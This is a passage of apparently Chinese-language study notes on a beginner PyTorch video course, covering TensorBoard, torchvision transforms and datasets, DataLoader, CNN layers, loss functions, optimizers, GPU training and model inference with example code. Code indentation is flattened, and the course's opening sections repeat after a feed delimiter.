10000).reshape(100, 100) / 10000        img[1] = 1 - np.arange(0, 10000).reshape(100, 100) / 10000                                            img_HWC = np.zeros((100, 100, 3))        img_HWC[:, :, 0] = np.arange(0, 10000).reshape(100, 100) / 10000        img_HWC[:, :, 1] = 1 - np.arange(0, 10000).reshape(100, 100) / 10000                                            writer = SummaryWriter()        writer.add_image('my_image', img, 0)                                            # If you have non-default dimension setting, set the dataformats argument.        writer.add_image('my_image_HWC', img_HWC, 0, dataformats='HWC')        writer.close()                                        Expected result:                                        .. image:: _static/img/tensorboard/add_image.png       :scale: 50%                                        """

    ​ 从 PIL 到 numpy,需要在 add_image() 中指定 shape 中每一个数字/维表示的含义。dataformats="HWC"(高、宽、通道数)

    from torch.utils.tensorboard import SummaryWriter
    import numpy as np
    from PIL import Image

    writer = SummaryWriter("logs")
    image_path = r"dataset\train\ants\0013035.jpg"
    img_PIL = Image.open(image_path)
    img_array = np.array(img_PIL)
    print(type(img_array))
    print(img_array.shape)

    writer.add_image("test", img_array, 2, dataformats="HWC")
    for i in range(100):
    writer.add_scalar("y=2x", 2 * i, i)

    writer.close()

    png

    Transforms 的使用

    transforms 是一个工具包,读入图片经过 transforms 后产生结果。

    transforms.ToTensor() 将 Image 格式转换成 tensor 格式。

    from torchvision import transforms
    from PIL import Image
    from torch.utils.tensorboard import SummaryWriter

    img_path = r"dataset/train/ants/0013035.jpg"
    img = Image.open(img_path)

    writer = SummaryWriter("logs")

    # transforms 该如何被使用
    tensor_trans = transforms.ToTensor()
    tensor_img = tensor_trans(img)

    print(tensor_img)

    writer.add_image("Tensor_img", tensor_img)

    writer.close()

    常见的 Transforms(一)

    讲了 transforms.Normalize 的用法。

    class Normalize(torch.nn.Module):
    """Normalize a tensor image with mean and standard deviation. 使用平均值和标准偏差归一化张量图像
    This transform does not support PIL Image.
    Given mean: ``(mean[1],...,mean[n])`` and std: ``(std[1],..,std[n])`` for ``n``
    channels, this transform will normalize each channel of the input
    ``torch.*Tensor`` i.e.,
    ``output[channel] = (input[channel] - mean[channel]) / std[channel]``

    .. note::
    This transform acts out of place, i.e., it does not mutate the input tensor.

    Args:
    mean (sequence): Sequence of means for each channel.
    std (sequence): Sequence of standard deviations for each channel.
    inplace(bool,optional): Bool to make this operation in-place.

    """
    from PIL import Image
    from torch.utils.tensorboard import SummaryWriter
    from torchvision import transforms

    writer = SummaryWriter("logs")
    img = Image.open("images/pytorch.png")
    print(img)

    # ToTensor
    trans_totensor = transforms.ToTensor()
    img_tensor = trans_totensor(img)
    writer.add_image("ToTensor", img_tensor)

    # Normalize
    print(img_tensor[0][0][0])
    trans_norm = transforms.Normalize([6, 3, 2], [9, 3, 5])
    img_norm = trans_norm(img_tensor)
    print(img_norm[0][0][0])
    writer.add_image("Normalize", img_norm, 1)

    png

    常见的 Transforms(二)

    Resize 调整图像大小。

    # Resize
    print(img.size)
    trans_resize = transforms.Resize((512, 512))
    # img PIL -> resize -> img_resize PIL
    img_resize = trans_resize(img)
    # img_resize PIL -> totensor -> img_resize tensor
    img_resize = trans_totensor(img_resize)
    writer.add_image("Resize", img_resize, 0)
    print(img_resize)

    png


    Compose: 将transforms列表里面的transform操作进行遍历。

    class Compose:
    """Composes several transforms together. This transform does not support torchscript.
    Please, see the note below.

    Args:
    transforms (list of ``Transform`` objects): list of transforms to compose.

    Example:
    >>> transforms.Compose([
    >>> transforms.CenterCrop(10),
    >>> transforms.PILToTensor(),
    >>> transforms.ConvertImageDtype(torch.float),
    >>> ])

    .. note::
    In order to script the transformations, please use ``torch.nn.Sequential`` as below.

    >>> transforms = torch.nn.Sequential(
    >>> transforms.CenterCrop(10),
    >>> transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),
    >>> )
    >>> scripted_transforms = torch.jit.script(transforms)

    Make sure to use only scriptable transformations, i.e. that work with ``torch.Tensor``, does not require
    `lambda` functions or ``PIL.Image``.

    """
    # Compose - resize - 2
    trans_resize_2 = transforms.Resize(512)
    # PIL -> PIL -> tensor
    trans_compose = transforms.Compose([trans_resize_2, trans_totensor])
    img_resize_2 = trans_compose(img)
    writer.add_image("Resize", img_resize_2, 1)

    ​ 相当于先缩放 trans_resize_2,再转换成 tensor 类型 trans_totensor


    RandomCrop 随机裁剪

    # RandomCrop
    trans_random = transforms.RandomCrop([32, 64])
    trans_compose_2 = transforms.Compose([trans_random, trans_totensor])
    for i in range(10):
    img_crop = trans_compose_2(img)
    writer.add_image("RandomCropHW", img_crop, i)

    png

    torchvision 中的数据集使用

    ​ 在官网上查看 torchvision.datasets 的用法

    ​ 选用 CIFAR10 数据集,读入 train_settest_set

    train_set = torchvision.datasets.CIFAR10(root="./dataset", train=True, transform=dataset_transform, download=True)
    test_set = torchvision.datasets.CIFAR10(root="./dataset", train=False, transform=dataset_transform, download=True)

    ​ 如果选择 download=True,会检查并验证 root 中是否存在数据集且是否完整,若没有,则会下载:

    C:\Users\gzjzx\anaconda3\python.exe D:/Study/1st-year-master/XiaoTuDui/Test/P10_dataset_transform.py
    Downloading https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz to ./dataset\cifar-10-python.tar.gz
    1%| | 1114112/170498071 [00:40<48:11, 58582.60it/s]

    ​ 可以将网址 https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz 复制到迅雷中由训练代下载,速度会快,将下载好的数据库拷贝回去。

    Using downloaded and verified file: ./dataset\cifar-10-python.tar.gz
    Extracting ./dataset\cifar-10-python.tar.gz to ./dataset
    Files already downloaded and verified

    ​ 根据官网 CIFAR-10 and CIFAR-100 datasets (toronto.edu) 对数据库的描述,查看数据信息:

    print(test_set[0])
    print(test_set.classes)

    img, target = test_set[0]
    print(img)
    print(target)
    print(test_set.classes[target])
    # img.show()
    print(test_set[0])

    # 在 TensorBoard 中查看数据集中前 10 张图
    writer = SummaryWriter("p10")
    for i in range(10):
    img, target = test_set[i]
    writer.add_image("test_set", img, i)

    writer.close()

    png

    DataLoader 的使用

    png

    • Pytorch 有两个类:
      • Dataset: 提供一种方式去获取数据及其标签
        • 如何获取每一个数据及其标签
        • 告诉我们总共有多少数据
      • DataLoader: 为后面的网络提供不同的数据形式

    DataLoader 的使用:

    import torchvision

    # 准备的测试数据集
    from torch.utils.data import DataLoader
    from torch.utils.tensorboard import SummaryWriter

    test_data = torchvision.datasets.CIFAR10("./dataset", train=False, transform=torchvision.transforms.ToTensor())

    test_loader = DataLoader(dataset=test_data, batch_size=4, shuffle=True, num_workers=0, drop_last=False)

    # 测试数据集中第一张图片及 target
    img, target = test_data[0]
    print(img.shape)
    print(target)

    writer = SummaryWriter("dataloader")
    step = 0
    for data in test_loader:
    imgs, targets = data
    # print(imgs.shape)
    # print(targets)
    writer.add_images("test_data", imgs, step)
    step += 1

    writer.close()

    test_loader = DataLoader(dataset=test_data, batch_size=4, shuffle=True, num_workers=0, drop_last=False)

    • dataset=test_data,读入 test_data 的数据集
    • batch_size=4,每次读入 4 张图片
    • shuffle=True,打乱图片顺序
    • drop_last=False,数据集数量如果不能被 batch_size 整除,要丢弃最后一块吗?否

    png

    神经网络的基本骨架-nn.Module的使用

    ​ 查看帮助文档:

    ​ 对于神经网络的前向传播,input-forward-output, 自行设计一个神经网络的类,继承 nn.Moudle:初始化时,super(Model, self).__init__()

    import torch.nn as nn
    import torch.nn.functional as F

    class Model(nn.Module):
    def __init__(self):
    super(Model, self).__init__()
    self.conv1 = nn.Conv2d(1, 20, 5)
    self.conv2 = nn.Conv2d(20, 20, 5)

    def forward(self, x):
    x = F.relu(self.conv1(x))
    return F.relu(self.conv2(x))

    ​ 设计一个最简单的函数,让 output 为 input 的加 1:

    import torch
    from torch import nn

    class MyClass(nn.Module):
    def __init__(self):
    super().__init__()

    def forward(self, input):
    output = input + 1
    return output

    myClass = MyClass()
    input = torch.tensor(1.0)
    output = myClass(input)
    print(output)
    tensor(2.)

    土堆说卷积操作(可选看)

    ​ 大概讲了卷积操作 torch.nn.functional.conv2dstridepadding 的含义。

    import torch
    import torch.nn.functional as F

    input = torch.tensor([[1, 2, 0, 3, 1],
    [0, 1, 2, 3, 1],
    [1, 2, 1, 0, 0],
    [5, 2, 3, 1, 1],
    [2, 1, 0, 1, 1]])

    kernel = torch.tensor([[1, 2, 1],
    [0, 1, 0],
    [2, 1, 0]])

    input = torch.reshape(input, (1, 1, 5, 5))
    kernel = torch.reshape(kernel, (1, 1, 3, 3))

    print(input.shape)
    print(kernel.shape)

    output = F.conv2d(input, kernel, stride=1)
    print(output)

    output2 = F.conv2d(input, kernel, stride=2)
    print(output2)

    output3 = F.conv2d(input, kernel, stride=1, padding=1)
    print(output3)
    torch.Size([1, 1, 5, 5])
    torch.Size([1, 1, 3, 3])
    tensor([[[[10, 12, 12],
    [18, 16, 16],
    [13, 9, 3]]]])
    tensor([[[[10, 12],
    [13, 3]]]])
    tensor([[[[ 1, 3, 4, 10, 8],
    [ 5, 10, 12, 12, 6],
    [ 7, 18, 16, 16, 8],
    [11, 13, 9, 3, 4],
    [14, 13, 9, 7, 4]]]])

    神经网络-卷积层

    官方文档:

    torch.nn.Conv2d(in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True, padding_mode='zeros', device=None, dtype=None)

    • in_channels (int) – Number of channels in the input image 输入图像中的通道数
    • out_channels (int) – Number of channels produced by the convolution 卷积产生的通道数
    • kernel_size (int or tuple) – Size of the convolving kernel 卷积核的大小
    • stride (int or tuple, optional) – Stride of the convolution. Default: 1
    • padding (int, tuple or str, optional) – Padding added to all four sides of the input. Default: 0

    较少用:

    • padding_mode (str, optional) – 'zeros', 'reflect', 'replicate' or 'circular'. Default: 'zeros'
    • dilation (int or tuple, optional) – Spacing between kernel elements. Default: 1 内核元素之间的间距。默认值:1
    • groups (int, optional) – Number of blocked connections from input channels to output channels. Default: 1 从输入通道到输出通道的阻塞连接数。默认值:1
    • bias (bool, optional) – If True, adds a learnable bias to the output. Default: True 如果为“True”,则在输出中添加可学习的偏差。

    png

    ​ 输入/输出的大小计算公式,如果看论文时论文没有阐明,可以用这个公式推断出具体的参数。


    导入相关库:

    import torch
    import torchvision
    from torch import nn
    from torch.nn import Conv2d
    from torch.utils.data import DataLoader
    from torch.utils.tensorboard import SummaryWriter

    dataset = test_data = torchvision.datasets.CIFAR10("./dataset",
    train=False,
    transform=torchvision.transforms.ToTensor(),
    download=True)
    dataloader = DataLoader(dataset, batch_size=64)

    设计卷积神经网络结构:

    class MyClass(nn.Module):
    def __init__(self):
    super(MyClass, self).__init__()
    self.conv1 = Conv2d(in_channels=3, out_channels=6, kernel_size=3, stride=1, padding=0)

    def forward(self, x):
    x = self.conv1(x)
    return x


    myClass = MyClass()
    print(myClass)

    执行操作并输出到 Tensorboard 上:

    writer = SummaryWriter("./logs")
    step = 0
    for data in dataloader:
    imgs, targets = data
    output = myClass(imgs)
    print(imgs.shape)
    print(output.shape)
    # torch.Size([64, 3, 32, 32])
    writer.add_images("input", imgs, step)
    # torch.Size([64, 6, 30, 30]) -> [xxx, 3, 30, 30]
    output = torch.reshape(output, (-1, 3, 30, 30))
    writer.add_images("output", output, step)
    step += 1

    png

    神经网络-最大池化的使用

    Max-pooling 是 下采样的一种。

    官方文档:

    torch.nn.MaxPool2d(kernel_size, stride=None, padding=0, dilation=1, return_indices=False, ceil_mode=False)

    • kernel_size (Union[int, Tuple[int, int]**]) – the size of the window to take a max over 要放大的窗口的大小
    • stride (Union[int, Tuple[int, int]**]) – the stride of the window. Default value is kernel_size 窗户的跨步
    • padding (Union[int, Tuple[int, int]**]) – Implicit negative infinity padding to be added on both sides 要在两侧添加的隐式负无穷大填充
    • dilation (Union[int, Tuple[int, int]**]) – a parameter that controls the stride of elements in the window 一个参数,用于控制窗口中元素的步幅
    • return_indices (bool) – if True, will return the max indices along with the outputs. Useful for torch.nn.MaxUnpool2d later 如果为“True”,则将返回最大索引以及输出
    • ceil_mode (bool) – when True, will use ceil instead of floor to compute the output shap 当为True时,将使用ceil(向上取整)而不是floor(向下取整)来计算输出形状

    import torch
    import torchvision
    from torch import nn
    from torch.nn import MaxPool2d
    from torch.utils.data import DataLoader
    from torch.utils.tensorboard import SummaryWriter

    dataset = test_data = torchvision.datasets.CIFAR10("./dataset",
    train=False,
    transform=torchvision.transforms.ToTensor(),
    download=True)
    dataloader = DataLoader(dataset, batch_size=64)

    input = torch.tensor([[1, 2, 0, 3, 1],
    [0, 1, 2, 3, 1],
    [1, 2, 1, 0, 0],
    [5, 2, 3, 1, 1],
    [2, 1, 0, 1, 1]], dtype=torch.float32)
    torch.reshape(input, (-1, 1, 5, 5))
    print(input.shape)


    class MyClass(nn.Module):
    def __init__(self):
    super(MyClass, self).__init__()
    self.maxpool1 = MaxPool2d(kernel_size=3, ceil_mode=False)

    def forward(self, input):
    output = self.maxpool1(input)
    return output


    myClass = MyClass()

    writer = SummaryWriter("./logs_maxpool")
    step = 0

    for data in dataloader:
    imgs, targets = data
    writer.add_images("input", imgs, step)
    output = myClass(imgs)
    writer.add_images("output", output, step)
    step += 1

    writer.close()

    png

    神经网络-非线性激活

    官方文档:

    import torch
    import torchvision
    from torch import nn
    from torch.nn import ReLU
    from torch.utils.data import DataLoader
    from torch.utils.tensorboard import SummaryWriter

    input = torch.tensor([[1, -0.5],
    [-1, 3]])

    input = torch.reshape(input, (-1, 1, 2, 2)) # 将其转换为 ReLU 能接受的形式
    print(input.shape)

    dataset = torchvision.datasets.CIFAR10("./dataset", train=False, download=True,
    transform=torchvision.transforms.ToTensor())

    dataloader = DataLoader(dataset, batch_size=64)


    class MyClass(nn.Module):
    def __init__(self):
    super(MyClass, self).__init__()
    self.relu1 = ReLU()

    def forward(self, input):
    output = self.relu1(input)
    return output


    myclass = MyClass()

    writer = SummaryWriter("./logs_relu")
    step = 0
    for data in dataloader:
    imgs, targets = data
    writer.add_images("inputs", imgs, global_step=step)
    output = myclass(imgs)
    writer.add_images("output", output, step)
    step += 1

    writer.close()

    png

    神经网络-线性层及其他层介绍

    import torch
    import torchvision
    from torch import nn
    from torch.nn import Linear
    from torch.utils.data import DataLoader

    dataset = torchvision.datasets.CIFAR10("./dataset", train=False, transform=torchvision.transforms.ToTensor(),
    download=True)

    dataloader = DataLoader(dataset, batch_size=64)


    class MyClass(nn.Module):
    def __init__(self):
    super(MyClass, self).__init__()
    self.linear1 = Linear(196608, 10)

    def forward(self, input):
    output = self.linear1(input)
    return output


    myclass = MyClass()

    for data in dataloader:
    imgs, targets = data
    print(imgs.shape)
    output = torch.flatten(imgs)
    # output = torch.reshape(imgs, (1, 1, 1, -1))
    print(output.shape)
    output = myclass(output)
    print(output.shape)

    ​ 从 torch.nn — PyTorch 2.0 documentation 获取更多神经网络架构。

    ​ 也可从 Search — Torchvision 0.15 documentation (pytorch.org)Models and pre-trained weights — Torchvision 0.15 documentation (pytorch.org) 获取经典神经网络模型。

    神经网络-搭建小实战和 Sequential 的使用

    ​ 使用 Sequential() 将多个神经网络架构整合成一个。

    ​ 整合如下神经网络:

    png

    import torch
    from torch import nn
    from torch.nn import Conv2d, MaxPool2d, Flatten, Linear, Sequential
    from torch.utils.tensorboard import SummaryWriter


    class MyClass(nn.Module):
    def __init__(self):
    super(MyClass, self).__init__()
    self.model1 = Sequential(
    Conv2d(3, 32, 5, padding=2),
    MaxPool2d(2),
    Conv2d(32, 32, 5, padding=2),
    MaxPool2d(2),
    Conv2d(32, 64, 5, padding=2),
    MaxPool2d(2),
    Flatten(),
    Linear(1024, 64),
    Linear(64, 10)
    )

    def forward(self, x):
    x = self.model1(x)
    return x

    myClass = MyClass()
    print(myClass)
    input = torch.ones((64, 3, 32, 32))
    output = myClass(input)
    print(output.shape)

    writer = SummaryWriter('../logs_seq')
    writer.add_graph(myClass, input)
    writer.close()

    ​ 在 SummaryWriter() 中显示完整架构。

    png

    损失函数与反向传播

    pytorch 中内置了很多损失函数。Search — PyTorch 2.0 documentation

    L1Loss()MSELoss()CrossEntropyLoss()

    import torch
    from torch import nn
    from torch.nn import L1Loss, MSELoss

    inputs = torch.tensor([1, 2, 3], dtype=torch.float32)
    targets = torch.tensor([1, 2, 5], dtype=torch.float32)

    inputs = torch.reshape(inputs, (1, 1, 1, 3))
    targets = torch.reshape(targets, (1, 1, 1, 3))

    loss = L1Loss()
    result = loss(inputs, targets)

    loss_mse = MSELoss()
    result_mse = loss_mse(inputs, targets)

    print(result, result_mse)

    x = torch.tensor([0.1, 0.2, 0.3])
    y = torch.tensor([1])
    x = torch.reshape(x, (1, 3))
    loss_cross = nn.CrossEntropyLoss()
    result_cross = loss_cross(x, y)
    print(result_cross)

    ​ 对损失函数进行反向传播可以得到模型中各个参数的梯度。result_loss.backward()

    import torch
    import torchvision
    from torch import nn
    from torch.nn import Conv2d, MaxPool2d, Flatten, Linear, Sequential
    from torch.utils.data import DataLoader
    from torch.utils.tensorboard import SummaryWriter

    dataset = torchvision.datasets.CIFAR10("../dataset", train=False, transform=torchvision.transforms.ToTensor(),
    download=True)

    dataloader = DataLoader(dataset, batch_size=1)


    class MyClass(nn.Module):
    def __init__(self):
    super(MyClass, self).__init__()
    self.model1 = Sequential(
    Conv2d(3, 32, 5, padding=2),
    MaxPool2d(2),
    Conv2d(32, 32, 5, padding=2),
    MaxPool2d(2),
    Conv2d(32, 64, 5, padding=2),
    MaxPool2d(2),
    Flatten(),
    Linear(1024, 64),
    Linear(64, 10)
    )

    def forward(self, x):
    x = self.model1(x)
    return x


    loss = nn.CrossEntropyLoss()
    myClass = MyClass()
    for data in dataloader:
    imgs, targets = data
    outputs = myClass(imgs)
    print(outputs)
    print(targets)
    result_loss = loss(outputs, targets)
    print(result_loss)
    result_loss.backward()

    优化器

    官方文档:

    loss = nn.CrossEntropyLoss()
    myClass = MyClass()
    optim = torch.optim.SGD(myClass.parameters(), lr=0.01)
    for epoch in range(20):
    running_loss = 0.0
    for data in dataloader:
    imgs, targets = data
    outputs = myClass(imgs)
    result_loss = loss(outputs, targets)
    optim.zero_grad()
    result_loss.backward()
    optim.step()
    running_loss = running_loss + result_loss
    print(running_loss)

    ​ 以最基本的随机梯度下降为例:optim = torch.optim.SGD(myClass.parameters(), lr=0.01)

    ,读入模型参数,然后读入学习率。

    • 嵌套在for epoch in range(20): 进行多轮参数优化。

    • 每次梯度下降都要清零梯度:optim.zero_grad()

    • 计算出新的梯度:result_loss.backward()

    • 更新模型参数:optim.step()

    ​ 一般而言,每轮迭代会让损失函数值变小。

    现有网络模型的使用及修改

    ​ 从官网 Models and pre-trained weights — Torchvision 0.15 documentation (pytorch.org) 中可以获得流行的模型以及 pretrain 后的模型。

    • 初始化 vgg-16 模型,参数不变:vgg16_false = torchvision.models.vgg16(pretrained=False)

    • 初始化 vgg-16 模型,并从官网上下载经过预训练后的参数:vgg16_true = torchvision.models.vgg16(pretrained=True)

    • 在现有模型后追加层:vgg16_true.add_module('add_linear', nn.Linear(1000, 10))

    • 在现有模型后更改层:vgg16_false.classifier[6] = nn.Linear(4096, 10)

    完整的模型训练套路(一)

    单独建一个 model.py 文件,用于定义模型:

    # 搭建神经网络
    import torch
    from torch import nn


    class MyClass(nn.Module):
    def __init__(self):
    super(MyClass, self).__init__()
    self.model = nn.Sequential(
    nn.Conv2d(3, 32, 5, padding=2),
    nn.MaxPool2d(2),
    nn.Conv2d(32, 32, 5, padding=2),
    nn.MaxPool2d(2),
    nn.Conv2d(32, 64, 5, padding=2),
    nn.MaxPool2d(2),
    nn.Flatten(),
    nn.Linear(1024, 64),
    nn.Linear(64, 10)
    )

    def forward(self, x):
    x = self.model(x)
    return x


    if __name__ == '__main__':
    myClass = MyClass()
    input = torch.ones((64, 3, 32, 32))
    output = myClass(input)
    print(output.shape)

    train.py 中,设置损失函数,优化器,训练轮次等训练神经网络:

    from model import *
    import torchvision

    # 准备数据集
    from torch import nn
    from torch.utils.data import DataLoader

    train_data = torchvision.datasets.CIFAR10(root='../dataset', train=True, transform=torchvision.transforms.ToTensor(),
    download=True)
    test_data = torchvision.datasets.CIFAR10(root='../dataset', train=False, transform=torchvision.transforms.ToTensor(),
    download=True)
    # length 长度
    train_data_size = len(train_data)
    test_data_size = len(test_data)
    print('训练数据集的长度为:{}'.format(train_data_size))
    print('测试数据集的长度为:{}'.format(test_data_size))

    # 利用 DataLoader 来加载数据集
    train_dataloader = DataLoader(train_data, batch_size=64)
    test_dataloader = DataLoader(test_data, batch_size=64)

    # 创建网络模型
    myClass = MyClass()

    # 损失函数
    loss_fn = nn.CrossEntropyLoss()

    # 定义优化器
    learning_rate = 1e-2
    optimizer = torch.optim.SGD(myClass.parameters(), lr=learning_rate)

    # 设置训练网络的一些参数
    total_train_step = 0 # 记录训练的次数
    total_test_step = 0 # 记录测试的次数
    epoch = 10 # 训练的轮数

    # 训练
    for i in range(epoch):
    print('第 {} 轮训练开始'.format(i + 1))
    # 训练步骤开始
    for data in train_dataloader:
    imgs, targets = data
    outputs = myClass(imgs)
    loss = loss_fn(outputs, targets)

    optimizer.zero_grad()
    loss.backward()
    optimizer.step()

    total_train_step = total_train_step + 1
    print('训练次数: {}, Loss: {}'.format(total_train_step, loss.item()))

    完整的模型训练套路(二)(三)

    from torch.utils.tensorboard import SummaryWriter
    from model import *
    import torchvision

    # 准备数据集
    from torch import nn
    from torch.utils.data import DataLoader

    train_data = torchvision.datasets.CIFAR10(root='../dataset', train=True, transform=torchvision.transforms.ToTensor(),
    download=True)
    test_data = torchvision.datasets.CIFAR10(root='../dataset', train=False, transform=torchvision.transforms.ToTensor(),
    download=True)
    # length 长度
    train_data_size = len(train_data)
    test_data_size = len(test_data)
    print('训练数据集的长度为:{}'.format(train_data_size))
    print('测试数据集的长度为:{}'.format(test_data_size))

    # 利用 DataLoader 来加载数据集
    train_dataloader = DataLoader(train_data, batch_size=64)
    test_dataloader = DataLoader(test_data, batch_size=64)

    # 创建网络模型
    myClass = MyClass()

    # 损失函数
    loss_fn = nn.CrossEntropyLoss()

    # 定义优化器
    learning_rate = 1e-2
    optimizer = torch.optim.SGD(myClass.parameters(), lr=learning_rate)

    # 设置训练网络的一些参数
    total_train_step = 0 # 记录训练的次数
    total_test_step = 0 # 记录测试的次数
    epoch = 10 # 训练的轮数

    # 添加 tensorboard
    writer = SummaryWriter('../logs_train')

    # 训练
    for i in range(epoch):
    print('第 {} 轮训练开始'.format(i + 1))
    # 训练步骤开始
    myClass.train()
    for data in train_dataloader:
    imgs, targets = data
    outputs = myClass(imgs)
    loss = loss_fn(outputs, targets)

    optimizer.zero_grad()
    loss.backward()
    optimizer.step()

    total_train_step = total_train_step + 1
    if total_train_step % 100 == 0:
    print('训练次数: {}, Loss: {}'.format(total_train_step, loss.item()))
    writer.add_scalar('train_loss', loss.item(), total_train_step)

    # 测试步骤开始
    myClass.eval()
    total_test_loss = 0
    total_accuracy = 0
    with torch.no_grad():
    for data in test_dataloader:
    imgs, targets = data
    outputs = myClass(imgs)
    loss = loss_fn(outputs, targets)

    total_test_loss = total_test_loss + loss

    accuracy = (outputs.argmax(1) == targets).sum()
    total_accuracy += accuracy
    print('整体测试集上的 Loss: {}'.format(total_test_loss))
    print('整体测试集上的正确率: {}'.format(total_accuracy / test_data_size))
    writer.add_scalar('test_loss', total_test_loss, total_test_step)
    writer.add_scalar('total_accuracy', total_accuracy / test_data_size, total_test_step)
    total_test_step += 1

    torch.save(myClass, "myClass_{}.pth".format(i))
    # torch.save(myClass.state_dict(), "myClass_{}.pth".format(i))
    print("模型已保存")

    writer.close()

    ​ 将模型调整为 train / eval 模式:myClass.train()myClass.eval(),该调整对 DropoutBatchNorm 等架构有效。

    ​ 测试步骤(不更新参数,不计算梯度,可以节约内存): with torch.no_grad():

    ​ 输出每轮次的损失函数的值:

    if total_train_step % 100 == 0:
    print('训练次数: {}, Loss: {}'.format(total_train_step, loss.item()))

    ​ 计算正确率:

    accuracy = (outputs.argmax(1) == targets).sum()
    total_accuracy += accuracy

    ​ 使用 SummaryWriter 可视化训练过程:

    • writer.add_scalar('train_loss', loss.item(), total_train_step)
    • writer.add_scalar('test_loss', total_test_loss, total_test_step)
    • writer.add_scalar('total_accuracy', total_accuracy / test_data_size, total_test_step)

    png

    ​ 保存每轮次训练出的模型:

    torch.save(myClass, "myClass_{}.pth".format(i))
    # torch.save(myClass.state_dict(), "myClass_{}.pth".format(i))
    print("模型已保存")

    利用 GPU 训练(一)

    网络模型可以使用 cuda:

    if torch.cuda.is_available():
    myClass = MyClass()
    myClass = myClass.cuda() # 将网络模型转到 cuda 上

    损失函数可以使用 cuda:

    # 损失函数
    if torch.cuda.is_available():
    loss_fn = nn.CrossEntropyLoss()
    loss_fn = loss_fn.cuda()

    优化器不可以。

    测试集、数据集数据可以使用 cuda:

    for data in train_dataloader:
    imgs, targets = data
    if torch.cuda.is_available():
    imgs = imgs.cuda()
    targets = targets.cuda()
    for data in test_dataloader:
    imgs, targets = data
    if torch.cuda.is_available():
    imgs = imgs.cuda()
    targets = targets.cuda()

    png

    png

    利用 GPU 训练(二)

    使用 torch.device() 设置训练用的设备:device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')

    如果有多个 gpu,可以用cuda:0 指定 0 号 gpu 等。

    将模型放到相应设备上训练:

    • myClass = myClass.to(device) 模型

    • loss_fn = loss_fn.to(device) 损失函数

    • for data in train_dataloader:    imgs, targets = data    imgs = imgs.to(device)    targets = targets.to(device)

      ## 完整的模型验证套路

      利用已经训练好的模型,然后给它提供输入,得到期望的输出。

      ```python
      import torch
      import torchvision
      from PIL import Image
      from torch import nn

      image_path = '../imgs/dog.png'
      image = Image.open(image_path)
      image = image.convert('RGB')

      transform = torchvision.transforms.Compose([torchvision.transforms.Resize((32, 32)),
      torchvision.transforms.ToTensor()])
      image = transform(image)
      print(image.shape)


      class MyClass(nn.Module):
      def __init__(self):
      super(MyClass, self).__init__()
      self.model = nn.Sequential(
      nn.Conv2d(3, 32, 5, padding=2),
      nn.MaxPool2d(2),
      nn.Conv2d(32, 32, 5, padding=2),
      nn.MaxPool2d(2),
      nn.Conv2d(32, 64, 5, padding=2),
      nn.MaxPool2d(2),
      nn.Flatten(),
      nn.Linear(1024, 64),
      nn.Linear(64, 10)
      )

      def forward(self, x):
      x = self.model(x)
      return x

      model = torch.load("myClass_0.pth", map_location=torch.device('cpu'))
      print(model)

      image = torch.reshape(image, (1, 3, 32, 32))
      model.eval()
      with torch.no_grad():
      output = model(image)
      print(output)
      print(output.argmax(1))

    读入测试图片:

    image_path = '../imgs/dog.png'
    image = Image.open(image_path)
    image = image.convert('RGB')

    transform = torchvision.transforms.Compose([torchvision.transforms.Resize((32, 32)),
    torchvision.transforms.ToTensor()])
    image = transform(image)
    print(image.shape)

    读入已经训练好的模型,map_location=torch.device('cpu')让在 cuda 上训练的模型也可以在 cpu 中测试,否则会报错:

    model = torch.load("myClass_0.pth", map_location=torch.device('cpu'))
    print(model)

    输出预期结果:

    image = torch.reshape(image, (1, 3, 32, 32))
    model.eval()
    with torch.no_grad():
    output = model(image)
    print(output)
    print(output.argmax(1))
    tensor([[-2.7974, -0.1087,  0.5627,  1.2185,  1.4736,  1.4348,  2.3175,  1.3776,
    -3.5540, -0.6126]])
    tensor([6])

    看看开源项目

    ​ 看说明文档 README.md,一般 train.py 可以用来训练:

    ​ 训练一般有参数:【Python】Parser 通常用法 - 知乎 (zhihu.com)

    ]]>
    + 视频

    课程

    Python 学习中的两大法宝函数(当然也可以用在 PyTorch)

    1
    from torch.utils.data import Dataset
    1
    help(Dataset)
    1
    Dataset??

    PyTorch 加载数据初认识

    Pytorch 有两个类:

    • Dataset: 提供一种方式去获取数据及其标签
      • 如何获取每一个数据及其标签
      • 告诉我们总共有多少数据
    • Dataloader: 为后面的网络提供不同的数据形式

    Dataset 类代码实战

    png

    ​ 下载了数据包,是一个蚂蚁和蜜蜂的二分类问题。训练集根目录为 dataset/train,标签有 antsbees

    ​ 设计一个类 MyData,负责读取数据集:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    from torch.utils.data import Dataset
    from PIL import Image
    import os

    class MyData(Dataset):

    def __init__(self, root_dir, label_dir):
    """
    初始化
    :param root_dir: 根目录
    :param label_dir: 标签目录
    """
    self.root_dir = root_dir
    self.label_dir = label_dir
    self.path = os.path.join(self.root_dir, self.label_dir)
    self.img_path = os.listdir(self.path)

    def __getitem__(self, idx):
    """
    获取对象
    :param idx: 索引
    :return:
    """
    img_name = self.img_path[idx]
    img_item_path = os.path.join(self.root_dir, self.label_dir, img_name)
    img = Image.open(img_item_path)
    label = self.label_dir
    return img, label

    def __len__(self):
    return len(self.img_path)


    root_dir = "dataset/train"
    ants_label_dir = "ants"
    bees_label_dir = "bees"
    ants_dataset = MyData(root_dir, ants_label_dir)
    bees_dataset = MyData(root_dir, bees_label_dir)

    TensorBoard 的使用(一)

    使用 pytorch 的 tensorboard 在网页端显示函数图像 $y=2x$:

    1
    2
    3
    4
    5
    6
    7
    8
    from torch.utils.tensorboard import SummaryWriter

    writer = SummaryWriter("logs")

    for i in range(100):
    writer.add_scalar("y=2x", 2 * i, i)

    writer.close()

    在 shell 端口中 tensorboard --logdir=logs:(启动 tensorboard,logdir 目录为 logs

    1
    2
    3
    PS D:\Study\1st-year-master\XiaoTuDui\Test> tensorboard --logdir=logs
    Serving TensorBoard on localhost; to expose to the network, use a proxy or pass --bind_all
    TensorBoard 2.9.1 at http://localhost:6006/ (Press CTRL+C to quit)

    png

    如果两段 writer.add_scalar 名称相同,可能会出现一张图像混合形成两张图像的情况,可以考虑清除项目中 logs/ 的缓存刷新。

